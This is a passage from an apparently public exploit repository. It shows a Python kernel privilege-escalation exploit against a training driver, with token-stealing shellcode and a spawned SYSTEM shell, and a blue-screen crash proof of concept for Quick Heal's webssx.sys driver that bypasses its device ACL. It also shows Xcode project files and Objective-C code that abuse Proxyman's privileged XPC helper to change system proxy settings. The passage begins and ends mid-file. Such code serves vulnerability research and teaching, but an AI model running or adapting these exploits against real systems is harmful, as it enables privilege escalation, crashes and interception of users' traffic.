| return ((devicetype << 16) | (access << 14) | (function << 2) | method) 28 | 29 | def alloc_memory(base_address, input, input_size): 30 | """ 31 | Allocate input buffer 32 | """ 33 | print "[*] Allocating input buffer at %s" % hex(base_address) 34 | base_address_c = c_int(base_address) 35 | input_size_c = c_int(input_size) 36 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 37 | POINTER(c_int), 38 | c_ulong, 39 | POINTER(c_int), 40 | c_int, 41 | c_int] 42 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 43 | byref(base_address_c), 44 | 0x0, 45 | byref(input_size_c), 46 | MEM_RESERVE|MEM_COMMIT, 47 | PAGE_EXECUTE_READWRITE) 48 | if dwStatus != STATUS_SUCCESS: 49 | print "[-] Error while allocating memory: %s" % dwStatus 50 | getLastError() 51 | sys.exit() 52 | written = c_ulong() 53 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 54 | if alloc == 0: 55 | print "[-] Error while writing our input buffer memory: %s" % alloc 56 | getLastError() 57 | sys.exit() 58 | 59 | def tokenstealingx86(RETVAL, 
extra = ""): 60 | """ 61 | Retrun a token stealing shellcode 62 | """ 63 | #Windows 7 SP1 x86 64 | KPROCESS = '\x50' 65 | TOKEN = '\xF8' 66 | UPID = '\xB4' 67 | APLINKS = '\xB8' 68 | 69 | shellcode = ( 70 | "\x60" # pushad 71 | "\x33\xc0" # xor eax,eax 72 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 73 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 74 | "\x8b\xc8" # mov ecx,eax 75 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 76 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 77 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 78 | "\x75\xec" # jne 0xe 79 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 80 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 81 | "\x61" # popad 82 | ) 83 | 84 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 85 | 86 | if RETVAL == "": 87 | shellcode += "\xc3" #retn 88 | else: 89 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 90 | 91 | return shellcode 92 | 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver uninitialized stack variable privilige escalation" 96 | 97 | IOCTL_VULN = ctl_code(0x80B) #HACKSYS_EVD_IOCTL_UNINITIALIZED_STACK_VARIABLE 98 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 99 | dwReturn = c_ulong() 100 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 101 | inputbuffer = 0x41410000 #memory address of the input buffer 102 | inputbuffer_size = 0x100 103 | outputbuffer_size = 0x0 104 | IoStatusBlock = c_ulong() 105 | 106 | #allocate shellcode in memory 107 | SHELLCODE = tokenstealingx86(RETVAL = '') 108 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 109 | alloc_memory(0x42424242, stuff, 0x1000) 110 | 111 | #allocate input memory 112 | alloc_memory(0x41410000, "\x42" * 0x1000, 0x1000) 113 | 114 | #spray 
the stack 115 | #NtMapUserPhysicalPages( arbitrary r-3 pointer, 1024, 0x41414141 * 1024 ); 116 | for i in range(0,1000): 117 | """ 118 | NTSTATUS NtMapUserPhysicalPages ( 119 | __in PVOID VirtualAddress, 120 | __in ULONG_PTR NumberOfPages, 121 | __in_ecount_opt(NumberOfPages) PULONG_PTR UserPfnArray 122 | ) 123 | """ 124 | ntdll.NtMapUserPhysicalPages(None,1024,0x41410000) 125 | 126 | if driver_handle: 127 | #print "[*] Sending IOCTL and data to the driver..." 128 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 129 | None, 130 | None, 131 | None, 132 | byref(IoStatusBlock), 133 | IOCTL_VULN, 134 | inputbuffer, 135 | inputbuffer_size, 136 | None, 137 | 0x0 138 | ) 139 | if 'system' in os.popen('whoami').read(): 140 | print "[+] Getting system shell..." 141 | os.system("cmd.exe") 142 | else: 143 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /cve-2015-8285_Quick_Heal_16_webssx.sys/qh-webssx-bsod.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import sys 4 | 5 | kernel32 = windll.kernel32 6 | ntdll = windll.ntdll 7 | 8 | #GLOBAL VARIABLES 9 | 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | PAGE_EXECUTE_READWRITE = 0x00000040 13 | STATUS_SUCCESS = 0 14 | 15 | def alloc_in(base,evil_size): 16 | """ Allocate input buffer """ 17 | print "[*] Allocating input buffer" 18 | baseadd = c_int(base) 19 | size = c_int(evil_size) 20 | evil_input = "\x41" * 0x10 21 | evil_input += "\x42\x01\x42\x42" #to trigger memcpy 22 | evil_input += "\x42" * (0x130-0x14) 23 | evil_input += "\xc0\xff\xff\xff" #this will cause memcpy to fail, and trigger BSOD 24 | evil_input += "\x43" * (evil_size-len(evil_input)) 25 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, 26 | POINTER(c_int), c_int, c_int] 27 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 
0x0, 28 | byref(size), 29 | MEM_RESERVE|MEM_COMMIT, 30 | PAGE_EXECUTE_READWRITE) 31 | if dwStatus != STATUS_SUCCESS: 32 | print "[-] Error while allocating memory: %s" % hex(dwStatus+0xffffffff) 33 | sys.exit() 34 | written = c_ulong() 35 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base, evil_input, len(evil_input), byref(written)) 36 | if alloc == 0: 37 | print "[-] Error while writing our input buffer memory: %s" %\ 38 | alloc 39 | sys.exit() 40 | 41 | if __name__ == '__main__': 42 | print "[*] webssx BSOD" 43 | 44 | GENERIC_READ = 0x80000000 45 | GENERIC_WRITE = 0x40000000 46 | OPEN_EXISTING = 0x3 47 | IOCTL_VULN = 0x830020FC 48 | DEVICE_NAME = "\\\\.\\webssx\some" #add "some" to bypass ACL restriction, (FILE_DEVICE_SECURE_OPEN is not applied to the driver) 49 | dwReturn = c_ulong() 50 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 51 | 52 | inputbuffer = 0x41414141 #memory address of the input buffer 53 | inputbuffer_size = 0x1000 54 | outputbuffer_size = 0x0 55 | outputbuffer = 0x20000000 56 | alloc_in(inputbuffer,inputbuffer_size) 57 | IoStatusBlock = c_ulong() 58 | if driver_handle: 59 | print "[*] Talking to the driver sending vulnerable IOCTL..." 60 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 61 | None, 62 | None, 63 | None, 64 | byref(IoStatusBlock), 65 | IOCTL_VULN, 66 | inputbuffer, 67 | inputbuffer_size, 68 | outputbuffer, 69 | outputbuffer_size 70 | ) 71 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 
2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 50; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 4129560423A6EDFF0051D602 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 4129560323A6EDFF0051D602 /* AppDelegate.m */; }; 11 | 4129560723A6EDFF0051D602 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 4129560623A6EDFF0051D602 /* ViewController.m */; }; 12 | 4129560923A6EE020051D602 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 4129560823A6EE020051D602 /* Assets.xcassets */; }; 13 | 4129560C23A6EE020051D602 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 4129560A23A6EE020051D602 /* Main.storyboard */; }; 14 | 4129560F23A6EE020051D602 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 4129560E23A6EE020051D602 /* main.m */; }; 15 | /* End PBXBuildFile section */ 16 | 17 | /* Begin PBXFileReference section */ 18 | 412955FF23A6EDFF0051D602 /* PMCocoa.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = PMCocoa.app; sourceTree = BUILT_PRODUCTS_DIR; }; 19 | 4129560223A6EDFF0051D602 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 20 | 4129560323A6EDFF0051D602 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 21 | 4129560523A6EDFF0051D602 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 22 | 4129560623A6EDFF0051D602 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 23 | 4129560823A6EE020051D602 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 24 | 4129560B23A6EE020051D602 /* Base */ = {isa = PBXFileReference; 
lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 25 | 4129560D23A6EE020051D602 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 26 | 4129560E23A6EE020051D602 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 27 | 4129561023A6EE020051D602 /* PMCocoa.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = PMCocoa.entitlements; sourceTree = ""; }; 28 | /* End PBXFileReference section */ 29 | 30 | /* Begin PBXFrameworksBuildPhase section */ 31 | 412955FC23A6EDFF0051D602 /* Frameworks */ = { 32 | isa = PBXFrameworksBuildPhase; 33 | buildActionMask = 2147483647; 34 | files = ( 35 | ); 36 | runOnlyForDeploymentPostprocessing = 0; 37 | }; 38 | /* End PBXFrameworksBuildPhase section */ 39 | 40 | /* Begin PBXGroup section */ 41 | 412955F623A6EDFF0051D602 = { 42 | isa = PBXGroup; 43 | children = ( 44 | 4129560123A6EDFF0051D602 /* PMCocoa */, 45 | 4129560023A6EDFF0051D602 /* Products */, 46 | ); 47 | sourceTree = ""; 48 | }; 49 | 4129560023A6EDFF0051D602 /* Products */ = { 50 | isa = PBXGroup; 51 | children = ( 52 | 412955FF23A6EDFF0051D602 /* PMCocoa.app */, 53 | ); 54 | name = Products; 55 | sourceTree = ""; 56 | }; 57 | 4129560123A6EDFF0051D602 /* PMCocoa */ = { 58 | isa = PBXGroup; 59 | children = ( 60 | 4129560223A6EDFF0051D602 /* AppDelegate.h */, 61 | 4129560323A6EDFF0051D602 /* AppDelegate.m */, 62 | 4129560523A6EDFF0051D602 /* ViewController.h */, 63 | 4129560623A6EDFF0051D602 /* ViewController.m */, 64 | 4129560823A6EE020051D602 /* Assets.xcassets */, 65 | 4129560A23A6EE020051D602 /* Main.storyboard */, 66 | 4129560D23A6EE020051D602 /* Info.plist */, 67 | 4129560E23A6EE020051D602 /* main.m */, 68 | 4129561023A6EE020051D602 /* PMCocoa.entitlements */, 69 | ); 70 | path = PMCocoa; 71 | sourceTree = ""; 72 | }; 73 | /* End PBXGroup section */ 74 
| 75 | /* Begin PBXNativeTarget section */ 76 | 412955FE23A6EDFF0051D602 /* PMCocoa */ = { 77 | isa = PBXNativeTarget; 78 | buildConfigurationList = 4129561323A6EE020051D602 /* Build configuration list for PBXNativeTarget "PMCocoa" */; 79 | buildPhases = ( 80 | 412955FB23A6EDFF0051D602 /* Sources */, 81 | 412955FC23A6EDFF0051D602 /* Frameworks */, 82 | 412955FD23A6EDFF0051D602 /* Resources */, 83 | ); 84 | buildRules = ( 85 | ); 86 | dependencies = ( 87 | ); 88 | name = PMCocoa; 89 | productName = PMCocoa; 90 | productReference = 412955FF23A6EDFF0051D602 /* PMCocoa.app */; 91 | productType = "com.apple.product-type.application"; 92 | }; 93 | /* End PBXNativeTarget section */ 94 | 95 | /* Begin PBXProject section */ 96 | 412955F723A6EDFF0051D602 /* Project object */ = { 97 | isa = PBXProject; 98 | attributes = { 99 | LastUpgradeCheck = 1130; 100 | ORGANIZATIONNAME = csaba; 101 | TargetAttributes = { 102 | 412955FE23A6EDFF0051D602 = { 103 | CreatedOnToolsVersion = 11.3; 104 | }; 105 | }; 106 | }; 107 | buildConfigurationList = 412955FA23A6EDFF0051D602 /* Build configuration list for PBXProject "PMCocoa" */; 108 | compatibilityVersion = "Xcode 9.3"; 109 | developmentRegion = en; 110 | hasScannedForEncodings = 0; 111 | knownRegions = ( 112 | en, 113 | Base, 114 | ); 115 | mainGroup = 412955F623A6EDFF0051D602; 116 | productRefGroup = 4129560023A6EDFF0051D602 /* Products */; 117 | projectDirPath = ""; 118 | projectRoot = ""; 119 | targets = ( 120 | 412955FE23A6EDFF0051D602 /* PMCocoa */, 121 | ); 122 | }; 123 | /* End PBXProject section */ 124 | 125 | /* Begin PBXResourcesBuildPhase section */ 126 | 412955FD23A6EDFF0051D602 /* Resources */ = { 127 | isa = PBXResourcesBuildPhase; 128 | buildActionMask = 2147483647; 129 | files = ( 130 | 4129560923A6EE020051D602 /* Assets.xcassets in Resources */, 131 | 4129560C23A6EE020051D602 /* Main.storyboard in Resources */, 132 | ); 133 | runOnlyForDeploymentPostprocessing = 0; 134 | }; 135 | /* End PBXResourcesBuildPhase section */ 
136 | 137 | /* Begin PBXSourcesBuildPhase section */ 138 | 412955FB23A6EDFF0051D602 /* Sources */ = { 139 | isa = PBXSourcesBuildPhase; 140 | buildActionMask = 2147483647; 141 | files = ( 142 | 4129560723A6EDFF0051D602 /* ViewController.m in Sources */, 143 | 4129560F23A6EE020051D602 /* main.m in Sources */, 144 | 4129560423A6EDFF0051D602 /* AppDelegate.m in Sources */, 145 | ); 146 | runOnlyForDeploymentPostprocessing = 0; 147 | }; 148 | /* End PBXSourcesBuildPhase section */ 149 | 150 | /* Begin PBXVariantGroup section */ 151 | 4129560A23A6EE020051D602 /* Main.storyboard */ = { 152 | isa = PBXVariantGroup; 153 | children = ( 154 | 4129560B23A6EE020051D602 /* Base */, 155 | ); 156 | name = Main.storyboard; 157 | sourceTree = ""; 158 | }; 159 | /* End PBXVariantGroup section */ 160 | 161 | /* Begin XCBuildConfiguration section */ 162 | 4129561123A6EE020051D602 /* Debug */ = { 163 | isa = XCBuildConfiguration; 164 | buildSettings = { 165 | ALWAYS_SEARCH_USER_PATHS = NO; 166 | CLANG_ANALYZER_NONNULL = YES; 167 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 168 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 169 | CLANG_CXX_LIBRARY = "libc++"; 170 | CLANG_ENABLE_MODULES = YES; 171 | CLANG_ENABLE_OBJC_ARC = YES; 172 | CLANG_ENABLE_OBJC_WEAK = YES; 173 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 174 | CLANG_WARN_BOOL_CONVERSION = YES; 175 | CLANG_WARN_COMMA = YES; 176 | CLANG_WARN_CONSTANT_CONVERSION = YES; 177 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 178 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 179 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 180 | CLANG_WARN_EMPTY_BODY = YES; 181 | CLANG_WARN_ENUM_CONVERSION = YES; 182 | CLANG_WARN_INFINITE_RECURSION = YES; 183 | CLANG_WARN_INT_CONVERSION = YES; 184 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 185 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 186 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 187 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 188 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 189 | 
CLANG_WARN_STRICT_PROTOTYPES = YES; 190 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 191 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 192 | CLANG_WARN_UNREACHABLE_CODE = YES; 193 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 194 | COPY_PHASE_STRIP = NO; 195 | DEBUG_INFORMATION_FORMAT = dwarf; 196 | ENABLE_STRICT_OBJC_MSGSEND = YES; 197 | ENABLE_TESTABILITY = YES; 198 | GCC_C_LANGUAGE_STANDARD = gnu11; 199 | GCC_DYNAMIC_NO_PIC = NO; 200 | GCC_NO_COMMON_BLOCKS = YES; 201 | GCC_OPTIMIZATION_LEVEL = 0; 202 | GCC_PREPROCESSOR_DEFINITIONS = ( 203 | "DEBUG=1", 204 | "$(inherited)", 205 | ); 206 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 207 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 208 | GCC_WARN_UNDECLARED_SELECTOR = YES; 209 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 210 | GCC_WARN_UNUSED_FUNCTION = YES; 211 | GCC_WARN_UNUSED_VARIABLE = YES; 212 | MACOSX_DEPLOYMENT_TARGET = 10.15; 213 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 214 | MTL_FAST_MATH = YES; 215 | ONLY_ACTIVE_ARCH = YES; 216 | SDKROOT = macosx; 217 | }; 218 | name = Debug; 219 | }; 220 | 4129561223A6EE020051D602 /* Release */ = { 221 | isa = XCBuildConfiguration; 222 | buildSettings = { 223 | ALWAYS_SEARCH_USER_PATHS = NO; 224 | CLANG_ANALYZER_NONNULL = YES; 225 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 226 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 227 | CLANG_CXX_LIBRARY = "libc++"; 228 | CLANG_ENABLE_MODULES = YES; 229 | CLANG_ENABLE_OBJC_ARC = YES; 230 | CLANG_ENABLE_OBJC_WEAK = YES; 231 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 232 | CLANG_WARN_BOOL_CONVERSION = YES; 233 | CLANG_WARN_COMMA = YES; 234 | CLANG_WARN_CONSTANT_CONVERSION = YES; 235 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 236 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 237 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 238 | CLANG_WARN_EMPTY_BODY = YES; 239 | CLANG_WARN_ENUM_CONVERSION = YES; 240 | CLANG_WARN_INFINITE_RECURSION = YES; 241 | CLANG_WARN_INT_CONVERSION = YES; 242 | 
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 243 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 244 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 245 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 246 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 247 | CLANG_WARN_STRICT_PROTOTYPES = YES; 248 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 249 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 250 | CLANG_WARN_UNREACHABLE_CODE = YES; 251 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 252 | COPY_PHASE_STRIP = NO; 253 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 254 | ENABLE_NS_ASSERTIONS = NO; 255 | ENABLE_STRICT_OBJC_MSGSEND = YES; 256 | GCC_C_LANGUAGE_STANDARD = gnu11; 257 | GCC_NO_COMMON_BLOCKS = YES; 258 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 259 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 260 | GCC_WARN_UNDECLARED_SELECTOR = YES; 261 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 262 | GCC_WARN_UNUSED_FUNCTION = YES; 263 | GCC_WARN_UNUSED_VARIABLE = YES; 264 | MACOSX_DEPLOYMENT_TARGET = 10.15; 265 | MTL_ENABLE_DEBUG_INFO = NO; 266 | MTL_FAST_MATH = YES; 267 | SDKROOT = macosx; 268 | }; 269 | name = Release; 270 | }; 271 | 4129561423A6EE020051D602 /* Debug */ = { 272 | isa = XCBuildConfiguration; 273 | buildSettings = { 274 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 275 | CODE_SIGN_ENTITLEMENTS = PMCocoa/PMCocoa.entitlements; 276 | CODE_SIGN_STYLE = Automatic; 277 | COMBINE_HIDPI_IMAGES = YES; 278 | DEVELOPMENT_TEAM = 33YRLYRBYV; 279 | ENABLE_HARDENED_RUNTIME = NO; 280 | INFOPLIST_FILE = PMCocoa/Info.plist; 281 | LD_RUNPATH_SEARCH_PATHS = ( 282 | "$(inherited)", 283 | "@executable_path/../Frameworks", 284 | ); 285 | PRODUCT_BUNDLE_IDENTIFIER = com.csaba.PMCocoa; 286 | PRODUCT_NAME = "$(TARGET_NAME)"; 287 | }; 288 | name = Debug; 289 | }; 290 | 4129561523A6EE020051D602 /* Release */ = { 291 | isa = XCBuildConfiguration; 292 | buildSettings = { 293 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 294 | CODE_SIGN_ENTITLEMENTS = PMCocoa/PMCocoa.entitlements; 295 | CODE_SIGN_STYLE = 
Automatic; 296 | COMBINE_HIDPI_IMAGES = YES; 297 | DEVELOPMENT_TEAM = 33YRLYRBYV; 298 | ENABLE_HARDENED_RUNTIME = NO; 299 | INFOPLIST_FILE = PMCocoa/Info.plist; 300 | LD_RUNPATH_SEARCH_PATHS = ( 301 | "$(inherited)", 302 | "@executable_path/../Frameworks", 303 | ); 304 | PRODUCT_BUNDLE_IDENTIFIER = com.csaba.PMCocoa; 305 | PRODUCT_NAME = "$(TARGET_NAME)"; 306 | }; 307 | name = Release; 308 | }; 309 | /* End XCBuildConfiguration section */ 310 | 311 | /* Begin XCConfigurationList section */ 312 | 412955FA23A6EDFF0051D602 /* Build configuration list for PBXProject "PMCocoa" */ = { 313 | isa = XCConfigurationList; 314 | buildConfigurations = ( 315 | 4129561123A6EE020051D602 /* Debug */, 316 | 4129561223A6EE020051D602 /* Release */, 317 | ); 318 | defaultConfigurationIsVisible = 0; 319 | defaultConfigurationName = Release; 320 | }; 321 | 4129561323A6EE020051D602 /* Build configuration list for PBXNativeTarget "PMCocoa" */ = { 322 | isa = XCConfigurationList; 323 | buildConfigurations = ( 324 | 4129561423A6EE020051D602 /* Debug */, 325 | 4129561523A6EE020051D602 /* Release */, 326 | ); 327 | defaultConfigurationIsVisible = 0; 328 | defaultConfigurationName = Release; 329 | }; 330 | /* End XCConfigurationList section */ 331 | }; 332 | rootObject = 412955F723A6EDFF0051D602 /* Project object */; 333 | } 334 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | 
-------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.xcworkspace/xcuserdata/csaby.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/theevilbit/exploits/2f5293f84c20b5813f9b253c883b5fc6e6989a5b/cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.xcworkspace/xcuserdata/csaby.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/xcuserdata/csaby.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | PMCocoa.xcscheme_^#shared#^_ 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : NSObject 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 
7 | // 8 | 9 | #import "AppDelegate.h" 10 | #import 11 | 12 | static NSString* XPCHelperMachServiceName = @"com.proxyman.NSProxy.HelperTool"; 13 | 14 | @protocol HelperToolProtocol 15 | - (void)setProxySystemPreferencesWithAuthorization:(NSData *)arg1 enabled:(BOOL)arg2 host:(NSString *)arg3 port:(NSString *)arg4 reply:(void (^)(NSError *, BOOL))arg5; 16 | - (void)getVersionWithReply:(void (^)(NSString *))arg1; 17 | - (void)connectWithEndpointReply:(void (^)(NSXPCListenerEndpoint *))arg1; 18 | @end 19 | 20 | 21 | @interface AppDelegate () 22 | 23 | @end 24 | 25 | @implementation AppDelegate 26 | 27 | - (void)applicationDidFinishLaunching:(NSNotification *)aNotification { 28 | // Insert code here to initialize your application 29 | NSData *authorization; 30 | OSStatus err; 31 | AuthorizationExternalForm extForm; 32 | AuthorizationRef authref; 33 | NSString *my_proxy = @"127.0.0.1"; 34 | NSString *my_port = @"3333"; 35 | Boolean enab = true; 36 | 37 | err = AuthorizationCreate(NULL, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &authref); 38 | const char* str = CFStringGetCStringPtr(SecCopyErrorMessageString(err, nil), kCFStringEncodingMacRoman); 39 | printf("OSStatus: %s\n",str); 40 | if (err == errAuthorizationSuccess) 41 | { 42 | err = AuthorizationMakeExternalForm(authref, &extForm); 43 | str = CFStringGetCStringPtr(SecCopyErrorMessageString(err, nil), kCFStringEncodingMacRoman); 44 | printf("OSStatus: %s\n",str); 45 | } 46 | if (err == errAuthorizationSuccess) 47 | { 48 | authorization = [[NSData alloc] initWithBytes:&extForm length:sizeof(extForm)]; 49 | str = CFStringGetCStringPtr(SecCopyErrorMessageString(err, nil), kCFStringEncodingMacRoman); 50 | printf("OSStatus: %s\n",str); 51 | } 52 | assert(err == errAuthorizationSuccess); 53 | 54 | NSString* _serviceName = XPCHelperMachServiceName; 55 | NSXPCConnection* _agentConnection = [[NSXPCConnection alloc] initWithMachServiceName:_serviceName options:4096]; 56 | [_agentConnection 
setRemoteObjectInterface:[NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)]]; 57 | [_agentConnection resume]; 58 | 59 | id obj = [_agentConnection remoteObjectProxyWithErrorHandler:^(NSError* error) 60 | { 61 | (void)error; 62 | NSLog(@"Connection Failure"); 63 | }]; 64 | NSLog(@"obj: %@", obj); 65 | NSLog(@"conn: %@", _agentConnection); 66 | [obj setProxySystemPreferencesWithAuthorization:authorization enabled:enab host:my_proxy port:my_port reply:^(NSError * err, BOOL b){ 67 | NSLog(@"Response, %@", err); 68 | }]; 69 | [obj setProxySystemPreferencesWithAuthorization:authorization enabled:enab host:my_proxy port:my_port reply:^(NSError * err, BOOL b){ 70 | NSLog(@"Response, %@", err); 71 | }]; 72 | NSLog(@"Done"); 73 | } 74 | 75 | 76 | - (void)applicationWillTerminate:(NSNotification *)aNotification { 77 | // Insert code here to tear down your application 78 | } 79 | 80 | 81 | @end 82 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "mac", 5 | "size" : "16x16", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "mac", 10 | "size" : "16x16", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "idiom" : "mac", 15 | "size" : "32x32", 16 | "scale" : "1x" 17 | }, 18 | { 19 | "idiom" : "mac", 20 | "size" : "32x32", 21 | "scale" : "2x" 22 | }, 23 | { 24 | "idiom" : "mac", 25 | "size" : "128x128", 26 | "scale" : "1x" 27 | }, 28 | { 29 | "idiom" : "mac", 30 | "size" : "128x128", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "idiom" : "mac", 35 | "size" : "256x256", 36 | "scale" : "1x" 37 | 